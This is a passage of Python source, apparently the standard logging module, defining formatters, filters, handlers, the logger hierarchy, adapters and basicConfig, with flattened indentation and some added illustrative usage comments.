%(thread)d Thread ID (if available)
%(threadName)s Thread name (if available)
%(process)d Process ID (if available)
%(message)s The result of record.getMessage(), computed just as
the record is emitted
"""
converter = time.localtime
def __init__(self, fmt=None, datefmt=None, style='%'):
"""
Initialize the formatter with specified format strings.
Initialize the formatter either with the specified format string, or a
default as described above. Allow for specialized date formatting with
the optional datefmt argument (if omitted, you get the ISO8601 format).
Use a style parameter of '%', '{' or '$' to specify that you want to
use one of %-formatting, :meth:`str.format` (``{}``) formatting or
:class:`string.Template` formatting in your format string.
        .. versionchanged:: 3.2
           Added the ``style`` parameter.
"""
if style not in _STYLES:
raise ValueError('Style must be one of: %s' % ','.join(
_STYLES.keys()))
self._style = _STYLES[style](fmt)
self._fmt = self._style._fmt
self.datefmt = datefmt
default_time_format = '%Y-%m-%d %H:%M:%S'
default_msec_format = '%s,%03d'
def formatTime(self, record, datefmt=None):
"""
Return the creation time of the specified LogRecord as formatted text.
This method should be called from format() by a formatter which
wants to make use of a formatted time. This method can be overridden
in formatters to provide for any specific requirement, but the
basic behaviour is as follows: if datefmt (a string) is specified,
it is used with time.strftime() to format the creation time of the
record. Otherwise, the ISO8601 format is used. The resulting
string is returned. This function uses a user-configurable function
to convert the creation time to a tuple. By default, time.localtime()
is used; to change this for a particular formatter instance, set the
'converter' attribute to a function with the same signature as
time.localtime() or time.gmtime(). To change it for all formatters,
for example if you want all logging times to be shown in GMT,
set the 'converter' attribute in the Formatter class.
"""
ct = self.converter(record.created)
if datefmt:
s = time.strftime(datefmt, ct)
else:
t = time.strftime(self.default_time_format, ct)
s = self.default_msec_format % (t, record.msecs)
return s
def formatException(self, ei):
"""
Format and return the specified exception information as a string.
This default implementation just uses
traceback.print_exception()
"""
sio = io.StringIO()
tb = ei[2]
# See issues #9427, #1553375. Commented out for now.
#if getattr(self, 'fullstack', False):
# traceback.print_stack(tb.tb_frame.f_back, file=sio)
traceback.print_exception(ei[0], ei[1], tb, None, sio)
s = sio.getvalue()
sio.close()
if s[-1:] == "\n":
s = s[:-1]
return s
def usesTime(self):
"""
Check if the format uses the creation time of the record.
"""
return self._style.usesTime()
def formatMessage(self, record):
return self._style.format(record)
def formatStack(self, stack_info):
"""
This method is provided as an extension point for specialized
formatting of stack information.
The input data is a string as returned from a call to
:func:`traceback.print_stack`, but with the last trailing newline
removed.
The base implementation just returns the value passed in.
"""
return stack_info
def format(self, record):
"""
Format the specified record as text.
The record's attribute dictionary is used as the operand to a
string formatting operation which yields the returned string.
Before formatting the dictionary, a couple of preparatory steps
are carried out. The message attribute of the record is computed
using LogRecord.getMessage(). If the formatting string uses the
        time (as determined by a call to usesTime()), formatTime() is
called to format the event time. If there is exception information,
it is formatted using formatException() and appended to the message.
"""
record.message = record.getMessage()
if self.usesTime():
record.asctime = self.formatTime(record, self.datefmt)
s = self.formatMessage(record)
if record.exc_info:
# Cache the traceback text to avoid converting it multiple times
# (it's constant anyway)
if not record.exc_text:
record.exc_text = self.formatException(record.exc_info)
if record.exc_text:
if s[-1:] != "\n":
s = s + "\n"
s = s + record.exc_text
if record.stack_info:
if s[-1:] != "\n":
s = s + "\n"
s = s + self.formatStack(record.stack_info)
return s
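# Illustrative usage sketch:
#
#     f = Formatter('%(asctime)s %(levelname)s %(message)s')
#     rec = makeLogRecord({'msg': 'ready', 'levelname': 'INFO'})
#     f.format(rec)   # -> e.g. '2013-01-01 12:00:00,000 INFO ready'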
#
# The default formatter to use when no other is specified
#
_defaultFormatter = Formatter()
class BufferingFormatter(object):
"""
A formatter suitable for formatting a number of records.
"""
def __init__(self, linefmt=None):
"""
Optionally specify a formatter which will be used to format each
individual record.
"""
if linefmt:
self.linefmt = linefmt
else:
self.linefmt = _defaultFormatter
def formatHeader(self, records):
"""
Return the header string for the specified records.
"""
return ""
def formatFooter(self, records):
"""
Return the footer string for the specified records.
"""
return ""
def format(self, records):
"""
Format the specified records and return the result as a string.
"""
rv = ""
if len(records) > 0:
rv = rv + self.formatHeader(records)
for record in records:
rv = rv + self.linefmt.format(record)
rv = rv + self.formatFooter(records)
return rv
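# Illustrative sketch (not part of the original module): a BufferingFormatter
# subclass that brackets a batch of records (BatchFormatter is a hypothetical
# name):
#
#     class BatchFormatter(BufferingFormatter):
#         def formatHeader(self, records):
#             return '--- %d records ---\n' % len(records)
#         def formatFooter(self, records):
#             return '--- end ---\n'
#
#     text = BatchFormatter().format(records)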
#---------------------------------------------------------------------------
# Filter classes and functions
#---------------------------------------------------------------------------
class Filter(object):
"""
Filter instances are used to perform arbitrary filtering of LogRecords.
Loggers and Handlers can optionally use Filter instances to filter
records as desired. The base filter class only allows events which are
below a certain point in the logger hierarchy. For example, a filter
initialized with "A.B" will allow events logged by loggers "A.B",
"A.B.C", "A.B.C.D", "A.B.D" etc. but not "A.BB", "B.A.B" etc. If
initialized with the empty string, all events are passed.
"""
def __init__(self, name=''):
"""
Initialize a filter.
Initialize with the name of the logger which, together with its
children, will have its events allowed through the filter. If no
name is specified, allow every event.
"""
self.name = name
self.nlen = len(name)
def filter(self, record):
"""
Determine if the specified record is to be logged.
Is the specified record to be logged? Returns 0 for no, nonzero for
yes. If deemed appropriate, the record may be modified in-place.
"""
if self.nlen == 0:
return True
elif self.name == record.name:
return True
elif record.name.find(self.name, 0, self.nlen) != 0:
return False
return (record.name[self.nlen] == ".")
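# Illustrative sketch (not part of the original module), mirroring the class
# docstring above (record_named() is a hypothetical helper that builds a
# LogRecord with the given logger name):
#
#     f = Filter('A.B')
#     f.filter(record_named('A.B.C'))   # True  - inside the "A.B" subtree
#     f.filter(record_named('A.BB'))    # False - outside the "A.B" subtree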
class Filterer(object):
"""
A base class for loggers and handlers which allows them to share
common code.
"""
def __init__(self):
"""
Initialize the list of filters to be an empty list.
"""
self.filters = []
def addFilter(self, filter):
"""
Add the specified filter to this handler.
"""
if not (filter in self.filters):
self.filters.append(filter)
def removeFilter(self, filter):
"""
Remove the specified filter from this handler.
"""
if filter in self.filters:
self.filters.remove(filter)
def filter(self, record):
"""
Determine if a record is loggable by consulting all the filters.
The default is to allow the record to be logged; any filter can veto
this and the record is then dropped. Returns a zero value if a record
is to be dropped, else non-zero.
        .. versionchanged:: 3.2
Allow filters to be just callables.
"""
rv = True
for f in self.filters:
if hasattr(f, 'filter'):
result = f.filter(record)
else:
result = f(record) # assume callable - will raise if not
if not result:
rv = False
break
return rv
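# Illustrative sketch (not part of the original module): since 3.2 a plain
# callable can serve as a filter, as the hasattr() check above allows:
#
#     handler.addFilter(lambda record: record.levelno >= WARNING)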
#---------------------------------------------------------------------------
# Handler classes and functions
#---------------------------------------------------------------------------
_handlers = weakref.WeakValueDictionary() #map of handler names to handlers
_handlerList = [] # added to allow handlers to be removed in reverse of order initialized
def _removeHandlerRef(wr):
"""
Remove a handler reference from the internal cleanup list.
"""
# This function can be called during module teardown, when globals are
# set to None. If _acquireLock is None, assume this is the case and do
# nothing.
if (_acquireLock is not None and _handlerList is not None and
_releaseLock is not None):
_acquireLock()
try:
if wr in _handlerList:
_handlerList.remove(wr)
finally:
_releaseLock()
def _addHandlerRef(handler):
"""
Add a handler to the internal cleanup list using a weak reference.
"""
_acquireLock()
try:
_handlerList.append(weakref.ref(handler, _removeHandlerRef))
finally:
_releaseLock()
class Handler(Filterer):
"""
Handler instances dispatch logging events to specific destinations.
The base handler class. Acts as a placeholder which defines the Handler
interface. Handlers can optionally use Formatter instances to format
records as desired. By default, no formatter is specified; in this case,
the 'raw' message as determined by record.message is logged.
"""
def __init__(self, level=NOTSET):
"""
Initializes the instance - basically setting the formatter to None
and the filter list to empty.
"""
Filterer.__init__(self)
self._name = None
self.level = _checkLevel(level)
self.formatter = None
# Add the handler to the global _handlerList (for cleanup on shutdown)
_addHandlerRef(self)
self.createLock()
def get_name(self):
return self._name
def set_name(self, name):
_acquireLock()
try:
if self._name in _handlers:
del _handlers[self._name]
self._name = name
if name:
_handlers[name] = self
finally:
_releaseLock()
name = property(get_name, set_name)
def createLock(self):
"""
Acquire a thread lock for serializing access to the underlying I/O.
"""
if threading:
self.lock = threading.RLock()
else: #pragma: no cover
self.lock = None
def acquire(self):
"""
Acquire the I/O thread lock.
"""
if self.lock:
self.lock.acquire()
def release(self):
"""
Release the I/O thread lock.
"""
if self.lock:
self.lock.release()
def setLevel(self, level):
"""
Set the logging level of this handler. level must be an int or a str.
"""
self.level = _checkLevel(level)
def format(self, record):
"""
Format the specified record.
If a formatter is set, use it. Otherwise, use the default formatter
for the module.
"""
if self.formatter:
fmt = self.formatter
else:
fmt = _defaultFormatter
return fmt.format(record)
def emit(self, record):
"""
Do whatever it takes to actually log the specified logging record.
This version is intended to be implemented by subclasses and so
raises a NotImplementedError.
"""
raise NotImplementedError('emit must be implemented '
'by Handler subclasses')
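    # Illustrative sketch (not part of the original module): a minimal
    # subclass satisfying the emit() contract above (ListHandler is a
    # hypothetical name), collecting formatted records in a list:
    #
    #     class ListHandler(Handler):
    #         def __init__(self):
    #             Handler.__init__(self)
    #             self.records = []
    #         def emit(self, record):
    #             self.records.append(self.format(record))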
def handle(self, record):
"""
Conditionally emit the specified logging record.
Emission depends on filters which may have been added to the handler.
Wrap the actual emission of the record with acquisition/release of
the I/O thread lock. Returns whether the filter passed the record for
emission.
"""
rv = self.filter(record)
if rv:
self.acquire()
try:
self.emit(record)
finally:
self.release()
return rv
def setFormatter(self, fmt):
"""
Set the formatter for this handler.
"""
self.formatter = fmt
def flush(self):
"""
Ensure all logging output has been flushed.
This version does nothing and is intended to be implemented by
subclasses.
"""
pass
def close(self):
"""
Tidy up any resources used by the handler.
This version removes the handler from an internal map of handlers,
_handlers, which is used for handler lookup by name. Subclasses
should ensure that this gets called from overridden close()
methods.
"""
#get the module data lock, as we're updating a shared structure.
_acquireLock()
try: #unlikely to raise an exception, but you never know...
if self._name and self._name in _handlers:
del _handlers[self._name]
finally:
_releaseLock()
def handleError(self, record):
"""
Handle errors which occur during an emit() call.
This method should be called from handlers when an exception is
encountered during an emit() call. If raiseExceptions is false,
exceptions get silently ignored. This is what is mostly wanted
for a logging system - most users will not care about errors in
the logging system, they are more interested in application errors.
You could, however, replace this with a custom handler if you wish.
The record which was being processed is passed in to this method.
"""
if raiseExceptions and sys.stderr: # see issue 13807
ei = sys.exc_info()
try:
traceback.print_exception(ei[0], ei[1], ei[2],
None, sys.stderr)
sys.stderr.write('Logged from file %s, line %s\n' % (
record.filename, record.lineno))
except IOError: #pragma: no cover
pass # see issue 5971
finally:
del ei
class StreamHandler(Handler):
"""
A handler class which writes logging records, appropriately formatted,
to a stream. Note that this class does not close the stream, as
sys.stdout or sys.stderr may be used.
"""
terminator = '\n'
def __init__(self, stream=None):
"""
Initialize the handler.
If stream is not specified, sys.stderr is used.
"""
Handler.__init__(self)
if stream is None:
stream = sys.stderr
self.stream = stream
def flush(self):
"""
Flushes the stream.
"""
self.acquire()
try:
if self.stream and hasattr(self.stream, "flush"):
self.stream.flush()
finally:
self.release()
def emit(self, record):
"""
Emit a record.
If a formatter is specified, it is used to format the record.
The record is then written to the stream with a trailing newline. If
exception information is present, it is formatted using
traceback.print_exception and appended to the stream. If the stream
has an 'encoding' attribute, it is used to determine how to do the
output to the stream.
"""
try:
msg = self.format(record)
stream = self.stream
stream.write(msg)
stream.write(self.terminator)
self.flush()
except (KeyboardInterrupt, SystemExit): #pragma: no cover
raise
except:
self.handleError(record)
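# Illustrative sketch (not part of the original module): StreamHandler defaults
# to sys.stderr, but any writable stream can be substituted:
#
#     h = StreamHandler(sys.stdout)
#     h.setFormatter(Formatter(BASIC_FORMAT))   # BASIC_FORMAT is defined below
#     getLogger('demo').addHandler(h)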
class FileHandler(StreamHandler):
"""
A handler class which writes formatted logging records to disk files.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
"""
#keep the absolute path, otherwise derived classes which use this
#may come a cropper when the current directory changes
self.baseFilename = os.path.abspath(filename)
self.mode = mode
self.encoding = encoding
self.delay = delay
if delay:
#We don't open the stream, but we still need to call the
#Handler constructor to set level, formatter, lock etc.
Handler.__init__(self)
self.stream = None
else:
StreamHandler.__init__(self, self._open())
def close(self):
"""
Closes the stream.
"""
self.acquire()
try:
if self.stream:
self.flush()
if hasattr(self.stream, "close"):
self.stream.close()
StreamHandler.close(self)
self.stream = None
finally:
self.release()
def _open(self):
"""
Open the current base file with the (original) mode and encoding.
Return the resulting stream.
"""
return open(self.baseFilename, self.mode, encoding=self.encoding)
def emit(self, record):
"""
Emit a record.
If the stream was not opened because 'delay' was specified in the
constructor, open it before calling the superclass's emit.
"""
if self.stream is None:
self.stream = self._open()
StreamHandler.emit(self, record)
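# Illustrative sketch (not part of the original module): with delay=True the
# file is only opened on the first emit, per the check above ('/tmp/app.log'
# is a hypothetical path):
#
#     h = FileHandler('/tmp/app.log', delay=True)
#     # no file is created yet; the first record routed here opens it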
class _StderrHandler(StreamHandler):
"""
This class is like a StreamHandler using sys.stderr, but always uses
whatever sys.stderr is currently set to rather than the value of
sys.stderr at handler construction time.
"""
def __init__(self, level=NOTSET):
"""
Initialize the handler.
"""
Handler.__init__(self, level)
@property
def stream(self):
return sys.stderr
_defaultLastResort = _StderrHandler(WARNING)
lastResort = _defaultLastResort
#---------------------------------------------------------------------------
# Manager classes and functions
#---------------------------------------------------------------------------
class PlaceHolder(object):
"""
PlaceHolder instances are used in the Manager logger hierarchy to take
the place of nodes for which no loggers have been defined. This class is
intended for internal use only and not as part of the public API.
"""
def __init__(self, alogger):
"""
Initialize with the specified logger being a child of this placeholder.
"""
self.loggerMap = { alogger : None }
def append(self, alogger):
"""
Add the specified logger as a child of this placeholder.
"""
if alogger not in self.loggerMap:
self.loggerMap[alogger] = None
#
# Determine which class to use when instantiating loggers.
#
_loggerClass = None
def setLoggerClass(klass):
"""
Set the class to be used when instantiating a logger. The class should
define __init__() such that only a name argument is required, and the
__init__() should call Logger.__init__()
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
global _loggerClass
_loggerClass = klass
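# Illustrative sketch (not part of the original module): installing a Logger
# subclass via setLoggerClass() (AuditLogger is a hypothetical name):
#
#     class AuditLogger(Logger):
#         def __init__(self, name):
#             Logger.__init__(self, name)
#
#     setLoggerClass(AuditLogger)
#     # loggers created afterwards by getLogger() are AuditLogger instances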
def getLoggerClass():
"""
Return the class to be used when instantiating a logger.
"""
return _loggerClass
class Manager(object):
"""
There is [under normal circumstances] just one Manager instance, which
holds the hierarchy of loggers.
"""
def __init__(self, rootnode):
"""
Initialize the manager with the root node of the logger hierarchy.
"""
self.root = rootnode
self.disable = 0
self.emittedNoHandlerWarning = False
self.loggerDict = {}
self.loggerClass = None
self.logRecordFactory = None
def getLogger(self, name):
"""
Get a logger with the specified name (channel name), creating it
if it doesn't yet exist. This name is a dot-separated hierarchical
name, such as "a", "a.b", "a.b.c" or similar.
If a PlaceHolder existed for the specified name [i.e. the logger
didn't exist but a child of it did], replace it with the created
logger and fix up the parent/child references which pointed to the
placeholder to now point to the logger.
"""
rv = None
if not isinstance(name, str):
raise TypeError('A logger name must be a string')
_acquireLock()
try:
if name in self.loggerDict:
rv = self.loggerDict[name]
if isinstance(rv, PlaceHolder):
ph = rv
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupChildren(ph, rv)
self._fixupParents(rv)
else:
rv = (self.loggerClass or _loggerClass)(name)
rv.manager = self
self.loggerDict[name] = rv
self._fixupParents(rv)
finally:
_releaseLock()
return rv
def setLoggerClass(self, klass):
"""
Set the class to be used when instantiating a logger with this Manager.
"""
if klass != Logger:
if not issubclass(klass, Logger):
raise TypeError("logger not derived from logging.Logger: "
+ klass.__name__)
self.loggerClass = klass
def setLogRecordFactory(self, factory):
"""
Set the factory to be used when instantiating a log record with this
Manager.
"""
self.logRecordFactory = factory
def _fixupParents(self, alogger):
"""
Ensure that there are either loggers or placeholders all the way
from the specified logger to the root of the logger hierarchy.
"""
name = alogger.name
i = name.rfind(".")
rv = None
while (i > 0) and not rv:
substr = name[:i]
if substr not in self.loggerDict:
self.loggerDict[substr] = PlaceHolder(alogger)
else:
obj = self.loggerDict[substr]
if isinstance(obj, Logger):
rv = obj
else:
assert isinstance(obj, PlaceHolder)
obj.append(alogger)
i = name.rfind(".", 0, i - 1)
if not rv:
rv = self.root
alogger.parent = rv
def _fixupChildren(self, ph, alogger):
"""
Ensure that children of the placeholder ph are connected to the
specified logger.
"""
name = alogger.name
namelen = len(name)
for c in ph.loggerMap.keys():
            #The if means ... if not c.parent.name.startswith(name)
if c.parent.name[:namelen] != name:
alogger.parent = c.parent
c.parent = alogger
#---------------------------------------------------------------------------
# Logger classes and functions
#---------------------------------------------------------------------------
class Logger(Filterer):
"""
Instances of the Logger class represent a single logging channel. A
"logging channel" indicates an area of an application. Exactly how an
"area" is defined is up to the application developer. Since an
application can have any number of areas, logging channels are identified
by a unique string. Application areas can be nested (e.g. an area
of "input processing" might include sub-areas "read CSV files", "read
XLS files" and "read Gnumeric files"). To cater for this natural nesting,
channel names are organized into a namespace hierarchy where levels are
separated by periods, much like the Java or Python package namespace. So
in the instance given above, channel names might be "input" for the upper
level, and "input.csv", "input.xls" and "input.gnu" for the sub-levels.
There is no arbitrary limit to the depth of nesting.
"""
def __init__(self, name, level=NOTSET):
"""
Initialize the logger with a name and an optional level.
"""
Filterer.__init__(self)
self.name = name
self.level = _checkLevel(level)
self.parent = None
self.propagate = True
self.handlers = []
self.disabled = False
def setLevel(self, level):
"""
Set the logging level of this logger. level must be an int or a str.
"""
self.level = _checkLevel(level)
def debug(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'DEBUG'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.debug("Houston, we have a %s", "thorny problem", exc_info=1)
"""
if self.isEnabledFor(DEBUG):
self._log(DEBUG, msg, args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'INFO'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.info("Houston, we have a %s", "interesting problem", exc_info=1)
"""
if self.isEnabledFor(INFO):
self._log(INFO, msg, args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'WARNING'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.warning("Houston, we have a %s", "bit of a problem", exc_info=1)
"""
if self.isEnabledFor(WARNING):
self._log(WARNING, msg, args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'ERROR'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.error("Houston, we have a %s", "major problem", exc_info=1)
"""
if self.isEnabledFor(ERROR):
self._log(ERROR, msg, args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Convenience method for logging an ERROR with exception information.
"""
kwargs['exc_info'] = True
self.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Log 'msg % args' with severity 'CRITICAL'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.critical("Houston, we have a %s", "major disaster", exc_info=1)
"""
if self.isEnabledFor(CRITICAL):
self._log(CRITICAL, msg, args, **kwargs)
fatal = critical
def log(self, level, msg, *args, **kwargs):
"""
Log 'msg % args' with the integer severity 'level'.
To pass exception information, use the keyword argument exc_info with
a true value, e.g.
logger.log(level, "We have a %s", "mysterious problem", exc_info=1)
"""
if not isinstance(level, int):
if raiseExceptions:
raise TypeError("level must be an integer")
else:
return
if self.isEnabledFor(level):
self._log(level, msg, args, **kwargs)
def findCaller(self, stack_info=False):
"""
Find the stack frame of the caller so that we can note the source
file name, line number and function name.
"""
f = currentframe()
#On some versions of IronPython, currentframe() returns None if
#IronPython isn't run with -X:Frames.
if f is not None:
f = f.f_back
rv = "(unknown file)", 0, "(unknown function)", None
while hasattr(f, "f_code"):
co = f.f_code
filename = os.path.normcase(co.co_filename)
if filename == _srcfile:
f = f.f_back
continue
sinfo = None
if stack_info:
sio = io.StringIO()
sio.write('Stack (most recent call last):\n')
traceback.print_stack(f, file=sio)
sinfo = sio.getvalue()
if sinfo[-1] == '\n':
sinfo = sinfo[:-1]
sio.close()
rv = (co.co_filename, f.f_lineno, co.co_name, sinfo)
break
return rv
def makeRecord(self, name, level, fn, lno, msg, args, exc_info,
func=None, extra=None, sinfo=None):
"""
A factory method which can be overridden in subclasses to create
specialized LogRecords.
"""
rv = _logRecordFactory(name, level, fn, lno, msg, args, exc_info, func,
sinfo)
if extra is not None:
for key in extra:
if (key in ["message", "asctime"]) or (key in rv.__dict__):
raise KeyError("Attempt to overwrite %r in LogRecord" % key)
rv.__dict__[key] = extra[key]
return rv
def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):
"""
Low-level logging routine which creates a LogRecord and then calls
all the handlers of this logger to handle the record.
"""
sinfo = None
if _srcfile:
#IronPython doesn't track Python frames, so findCaller raises an
#exception on some versions of IronPython. We trap it here so that
#IronPython can use logging.
try:
fn, lno, func, sinfo = self.findCaller(stack_info)
except ValueError: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
else: # pragma: no cover
fn, lno, func = "(unknown file)", 0, "(unknown function)"
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
record = self.makeRecord(self.name, level, fn, lno, msg, args,
exc_info, func, extra, sinfo)
self.handle(record)
def handle(self, record):
"""
Call the handlers for the specified record.
This method is used for unpickled records received from a socket, as
well as those created locally. Logger-level filtering is applied.
"""
if (not self.disabled) and self.filter(record):
self.callHandlers(record)
def addHandler(self, hdlr):
"""
Add the specified handler to this logger.
"""
_acquireLock()
try:
if not (hdlr in self.handlers):
self.handlers.append(hdlr)
finally:
_releaseLock()
def removeHandler(self, hdlr):
"""
Remove the specified handler from this logger.
"""
_acquireLock()
try:
if hdlr in self.handlers:
self.handlers.remove(hdlr)
finally:
_releaseLock()
def hasHandlers(self):
"""
See if this logger has any handlers configured.
Loop through all handlers for this logger and its parents in the
logger hierarchy. Return True if a handler was found, else False.
Stop searching up the hierarchy whenever a logger with the "propagate"
attribute set to zero is found - that will be the last logger which
is checked for the existence of handlers.
"""
c = self
rv = False
while c:
if c.handlers:
rv = True
break
if not c.propagate:
break
else:
c = c.parent
return rv
def callHandlers(self, record):
"""
Pass a record to all relevant handlers.
Loop through all handlers for this logger and its parents in the
logger hierarchy. If no handler was found, output a one-off error
message to sys.stderr. Stop searching up the hierarchy whenever a
logger with the "propagate" attribute set to zero is found - that
will be the last logger whose handlers are called.
"""
c = self
found = 0
while c:
for hdlr in c.handlers:
found = found + 1
if record.levelno >= hdlr.level:
hdlr.handle(record)
if not c.propagate:
c = None #break out
else:
c = c.parent
if (found == 0):
if lastResort:
if record.levelno >= lastResort.level:
lastResort.handle(record)
elif raiseExceptions and not self.manager.emittedNoHandlerWarning:
sys.stderr.write("No handlers could be found for logger"
" \"%s\"\n" % self.name)
self.manager.emittedNoHandlerWarning = True
def getEffectiveLevel(self):
"""
Get the effective level for this logger.
Loop through this logger and its parents in the logger hierarchy,
looking for a non-zero logging level. Return the first one found.
"""
logger = self
while logger:
if logger.level:
return logger.level
logger = logger.parent
return NOTSET
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getChild(self, suffix):
"""
Get a logger which is a descendant to this one.
This is a convenience method, such that
logging.getLogger('abc').getChild('def.ghi')
is the same as
logging.getLogger('abc.def.ghi')
It's useful, for example, when the parent logger is named using
__name__ rather than a literal string.
"""
if self.root is not self:
suffix = '.'.join((self.name, suffix))
return self.manager.getLogger(suffix)
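# Illustrative sketch (not part of the original module), restating the
# getChild() equivalence documented above:
#
#     getLogger('abc').getChild('def.ghi')   # same logger as
#     getLogger('abc.def.ghi')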
class RootLogger(Logger):
"""
    A root logger is not that different from any other logger, except that
it must have a logging level and there is only one instance of it in
the hierarchy.
"""
def __init__(self, level):
"""
Initialize the logger with the name "root".
"""
Logger.__init__(self, "root", level)
_loggerClass = Logger
class LoggerAdapter(object):
"""
An adapter for loggers which makes it easier to specify contextual
information in logging output.
"""
def __init__(self, logger, extra):
"""
Initialize the adapter with a logger and a dict-like object which
provides contextual information. This constructor signature allows
easy stacking of LoggerAdapters, if so desired.
You can effectively pass keyword arguments as shown in the
following example:
adapter = LoggerAdapter(someLogger, dict(p1=v1, p2="v2"))
"""
self.logger = logger
self.extra = extra
def process(self, msg, kwargs):
"""
Process the logging message and keyword arguments passed in to
a logging call to insert contextual information. You can either
manipulate the message itself, the keyword args or both. Return
the message and kwargs modified (or not) to suit your needs.
Normally, you'll only need to override this one method in a
LoggerAdapter subclass for your specific needs.
"""
kwargs["extra"] = self.extra
return msg, kwargs
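    # Illustrative sketch (not part of the original module): a process()
    # override that prefixes each message with a context value ('connid' is a
    # hypothetical key in self.extra):
    #
    #     def process(self, msg, kwargs):
    #         return '[%s] %s' % (self.extra['connid'], msg), kwargs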
#
# Boilerplate convenience methods
#
def debug(self, msg, *args, **kwargs):
"""
Delegate a debug call to the underlying logger.
"""
self.log(DEBUG, msg, *args, **kwargs)
def info(self, msg, *args, **kwargs):
"""
Delegate an info call to the underlying logger.
"""
self.log(INFO, msg, *args, **kwargs)
def warning(self, msg, *args, **kwargs):
"""
Delegate a warning call to the underlying logger.
"""
self.log(WARNING, msg, *args, **kwargs)
def warn(self, msg, *args, **kwargs):
warnings.warn("The 'warn' method is deprecated, "
"use 'warning' instead", DeprecationWarning, 2)
self.warning(msg, *args, **kwargs)
def error(self, msg, *args, **kwargs):
"""
Delegate an error call to the underlying logger.
"""
self.log(ERROR, msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
"""
Delegate an exception call to the underlying logger.
"""
kwargs["exc_info"] = True
self.log(ERROR, msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
"""
Delegate a critical call to the underlying logger.
"""
self.log(CRITICAL, msg, *args, **kwargs)
def log(self, level, msg, *args, **kwargs):
"""
Delegate a log call to the underlying logger, after adding
contextual information from this adapter instance.
"""
if self.isEnabledFor(level):
msg, kwargs = self.process(msg, kwargs)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level):
"""
Is this logger enabled for level 'level'?
"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def setLevel(self, level):
"""
Set the specified level on the underlying logger.
"""
self.logger.setLevel(level)
def getEffectiveLevel(self):
"""
Get the effective level for the underlying logger.
"""
return self.logger.getEffectiveLevel()
def hasHandlers(self):
"""
See if the underlying logger has any handlers.
"""
return self.logger.hasHandlers()
root = RootLogger(WARNING)
Logger.root = root
Logger.manager = Manager(Logger.root)
#---------------------------------------------------------------------------
# Configuration classes and functions
#---------------------------------------------------------------------------
BASIC_FORMAT = "%(levelname)s:%(name)s:%(message)s"
def basicConfig(**kwargs):
"""
Do basic configuration for the logging system.
This function does nothing if the root logger already has handlers
configured. It is a convenience method intended for use by simple scripts
to do one-shot configuration of the logging package.
The default behaviour is to create a StreamHandler which writes to
sys.stderr, set a formatter using the BASIC_FORMAT format string, and
add the handler to the root logger.
A number of optional keyword arguments may be specified, which can alter
the default behaviour.
filename Specifies that a FileHandler be created, using the specified
filename, rather than a StreamHandler.
filemode Specifies the mode to open the file, if filename is specified
(if filemode is unspecified, it defaults to 'a').
format Use the specified format string for the handler.
datefmt Use the specified date/time format.
style If a format string is specified, use this to specify the
type of format string (possible values '%', '{', '$', for
%-formatting, :meth:`str.format` and :class:`string.Template`
- defaults to '%').
level Set the root logger level to the specified level.
stream Use the specified stream to initialize the StreamHandler. Note
that this argument is incompatible with 'filename' - if both
are present, 'stream' is ignored.
handlers If specified, this should be an iterable of already created
handlers, which will be added to the root handler. Any handler
in the list which does not have a formatter assigned will be
assigned the formatter created in this function.
Note that you could specify a stream created using open(filename, mode)
rather than passing the filename and mode in. However, it should be
remembered that StreamHandler does not close its stream (since it may be
using sys.stdout or sys.stderr), whereas FileHandler closes its stream
when the handler is closed.
.. versionchanged:: 3.2
Added the ``style`` parameter.
.. versionchanged:: 3.3
Added the ``handlers`` parameter. A ``ValueError`` is now thrown for
incompatible arguments (e.g. ``handlers`` specified together with
``filename``/``filemode``, or ``filename``/``filemode`` specified
together with ``stream``, or ``handlers`` specified together with
        ``stream``).
"""
# Add thread safety in case someone mistakenly calls
# basicConfig() from multiple threads
_acquireLock()
try:
if len(root.handlers) == 0:
handlers = kwargs.get("handlers")
if handlers is None:
if "stream" in kwargs and "filename" in kwargs:
raise ValueError("'stream' and 'filename' should not be "
"specified together")
else:
if "stream" in kwargs or "filename" in kwargs:
raise ValueError("'stream' or 'filename' should not be "
"specified together with 'handlers'")
if handlers is None:
filename = kwargs.get("filename")
if filename:
mode = kwargs.get("filemode", 'a')
h = FileHandler(filename, mode)
else:
stream = kwargs.get("stream")
h = StreamHandler(stream)
handlers = [h]
fs = kwargs.get("format", BASIC_FORMAT)
dfs = kwargs.get("datefmt", None)
style = kwargs.get("style", '%')
fmt = Formatter(fs, dfs, style)
for h in handlers:
if h.formatter is None:
h.setFormatter(fmt)
root.addHandler(h)
level = kwargs.get("level")
if level is not None:
root.setLevel(level)
finally:
_releaseLock()
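# Illustrative sketch (not part of the original module): one-shot setup with
# the keyword arguments documented above ('/tmp/app.log' is a hypothetical
# path):
#
#     basicConfig(filename='/tmp/app.log', filemode='w', level=DEBUG,
#                 format='%(asctime)s %(levelname)s %(message)s')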
#---------------------------------------------------------------------------
# Utility functions at module level.
# Basically delegate everything to the root logger.
#---------------------------------------------------------------------------
def getLogger(name=None):
"""
